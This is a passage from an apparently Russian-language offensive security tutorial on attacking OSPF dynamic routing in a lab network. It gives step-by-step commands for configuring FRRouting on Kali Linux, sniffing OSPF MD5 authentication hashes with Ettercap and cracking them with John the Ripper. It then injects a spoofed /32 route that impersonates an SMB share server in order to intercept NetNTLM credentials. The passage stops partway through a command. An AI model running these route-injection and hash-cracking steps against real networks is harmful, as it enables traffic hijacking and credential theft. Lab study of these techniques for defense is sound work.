ровать домен маршрутизации OSPF с несколькими зонами, чтобы уменьшить нагрузку на вычислительные ресурсы маршрутизаторов. Нужно учитывать это в домене маршрутизации OSPF, как и возможность прохождения пакетов между этими зонами. Например, если ты собираешься выполнять инъекции маршрутов.

•Наличие пакетов приветствия Hello. Подключиться к домену маршру-

тизации OSPF будет возможно, если сетевой администратор не позаботился о конфигурации пассивных интерфейсов, сама конфигурация позволяет отключать рассылку пакетов приветствия на уровне самих анонсируемых сетей. Если в сетевом анализаторе не встретишь пакеты OSPF — либо OSPF нет, либо настроены пассивные интерфейсы. А это делает невозможным проведение атаки на домен динамической маршрутизации.

ВМЕШАТЕЛЬСТВО В ПРОЦЕСС МАРШРУТИЗАЦИИ

Чтобы атаковать домен динамической маршрутизации, нужно подключиться непосредственно к самому процессу маршрутизации. Это можно сделать через настоящий роутер (имею в виду железку) либо воспользоваться FRR.

FRRouting — это специальный виртуальный маршрутизатор, который может интегрироваться с твоей ОС и работать как настоящий роутер. Очень крутая штука, поскольку поддерживает множество интересных протоколов: BGP, IS-IS, OSPF, EIGRP, VRRP, BFD и так далее. В этой статье я воспользуюсь именно FRR.

В первую очередь нужно активировать демоны FRR. За каждый протокол будет отвечать отдельный демон. Нам понадобятся демоны ospfd и staticd.

root@kali:~# nano /etc/frr/daemons

ospfd=yes

staticd=yes

Перед запуском демона переключаем сетевой интерфейс в promiscuous mode, разрешаем маршрутизацию и активируем работу NAT Helper (NFCONNTRACK).

in9uz@kali:~$ sudo ip link set eth0 promisc on in9uz@kali:~$ sudo sysctl -w net.ipv4.ip_forward=1 in9uz@kali:~$ sudo modprobe nf_conntrack

root@kali:~# echo "1" > /proc/sys/net/netfilter/nf_conntrack_ helper

После этого включаем демон FRR и проверяем его состояние.

in9uz@kali:~$ sudo systemctl start frr

in9uz@kali:~$ sudo systemctl status frr

Состояние FRR

С помощью команды vtysh попадаем на панель управления маршрутизатором:

in9uz@kali:~$ sudo vtysh

kali# show ver

Панель управления FRR

Структура лабораторной сети

В качестве лаборатории мы с тобой выстроим трехуровневую сеть. Для SMBшары я выделил отдельный сегмент (WAREHOUSE), но на самом деле это просто коммутатор уровня распределения. Также есть несколько виртуальных сетей, они находятся на коммутаторах уровня доступа, а на коммутаторах уровня распределения происходит уже маршрутизация между самими VLAN.

Отказоустойчивость сети обеспечивает HSRPv2. Начиная с уровня распределения, я настроил динамическую маршрутизацию OSPF, все хранится в нулевой BACKBONE-зоне.

Топология лабораторной сети

•10.10.20.1 — Fake (VLAN 20) (Windows 10 LTSC);

•10.10.30.1 — Boundless (VLAN 30) (Windows 10 LTSC);

•10.10.50.2 — Attacker (VLAN 50) (Kali Linux);

•10.10.50.100 — Dist-SW1 (HSRPv2 Active) (Cisco vIOS L2 Image);

•10.10.50.101 — Dist-SW2 (HSRPv2 Standby) (Cisco vIOS L2 Image);

•192.168.100.1 — SMB Share (Windows Server 2019 Standard).

Анализ трафика

Первым делом нам нужно изучить трафик OSPF, узнать об ID зоны, наличии аутентификации, router-id и так далее. Из пакета OSPF Hello, полученного от Dist-SW1 (10.10.50.100), можно заметить, что используется нулевая зона

0.0.0.0.

Дамп OSPF-трафика

Также используется MD5-аутентификация. Она не позволяет неаутентифицированным роутерам входить в процесс маршрутизации. Не зная ключ, подключиться к сети OSPF не выйдет.

ОБХОД АУТЕНТИФИКАЦИИ (AUTHENTICATION BYPASSING)

Характеристики ключа

На скриншоте некоторые характеристики ключа. Идентификатор ключа (ID) — единица.

Для сниффинга криптографического MD5-хеша воспользуемся утилитой Ettercap. Перед этим переключаемся в promisc.

in9uz@kali:~$ sudo ip link set eth0 promisc on

in9uz@kali:~$ sudo ettercap -G

Ettercap обнаружил MD5-хеш

Копируем эти хеши и брутим. Кстати говоря, очень удобно, что хеши сразу представлены в формате John the Ripper.

in9uz@kali:~$ cat >> ospf-hashes

in9uz@kali:~$ john ospf-hashes --wordlist=ospfwordlist

Взломанный пароль от домена OSPF

Пароль удалось сбрутить, это flatl1ne. С этим ключом мы можем подключиться к сети OSPF.

EVIL TWIN И ПЕРЕХВАТ NETNTLM Начало атаки

Основной принцип атаки заключается в редистрибуции статического маршрута в сеть OSPF с наименьшей метрикой. Эта сеть выступит в качестве вектора для инъекции ложного маршрута. FRR позволяет оперировать статической маршрутизацией и ее редистрибуцией, что освобождает нас от использования дискретных утилит (Loki, Scapy и прочих).

Мы выполним спуфинг хоста SMB Share с адресом 192.168.100.1/32. А именно с помощью инжекта адреса SMB-шары. Инжект представляет собой LSA-сообщение пятого типа, будет сгенерировано сообщение LSU (link-state update), после чего легитимный маршрутизатор примет наш инжект и поместит его в таблицу маршрутизации, а также сообщит остальным соседям об этом объявлении.

kali# conf ter kali(config)# router ospf

kali(config-router) network 10.10.50.3/32 area 0.0.0.0 kali(config-router) redistribute static metric 0

В таблице маршрутизации хранятся только лучшие маршруты. У твоего инжекта должны быть наилучшие характеристики, а именно административное расстояние и метрика.

От административного расстояния (АР) зависит предпочтительность маршрута. Чем выше это значение, тем меньше вероятность, что маршрут будет выбран. Значение АР для OSPF эквивалентно 110.

Также у нас есть стоимость маршрута. С помощью FRR мы укажем на редистрибуцию статического маршрута с нулевой стоимостью. Чем эта метрика ниже, тем маршрут более предпочтителен. И так как при инжекте мы указываем маску /32, шанс помещения инжекта в таблицу маршрутизации крайне велик. Потому что пакет, оказавшийся на маршрутизаторе, пойдет в сеть с наибольшей маской (а это будет в формате маршрута 192.168.100.1/32

via 10.10.50.2)

Структура инъекции:

kali(config)# ip route 192.168.100.1/32 eth0

Здесь

•192.168.100.1 — адрес целевого сервера;

•/32 — маска подсети. Она эквивалентна 255.255.255.255;

•eth0 — сетевой интерфейс атакующей системы. То есть в маршруте адресом следующего прыжка (next hop) будет наш хост.

Теперь нужно создать вторичный адрес на сетевом интерфейсе со значением адреса целевой SMB-шары, так как трафик будет ходить на наш хост по dst ip

192.168.100.1/32.

in9uz@kali:~$ sudo ifconfig eth0:1 192.168.100.1 netmask 255.255.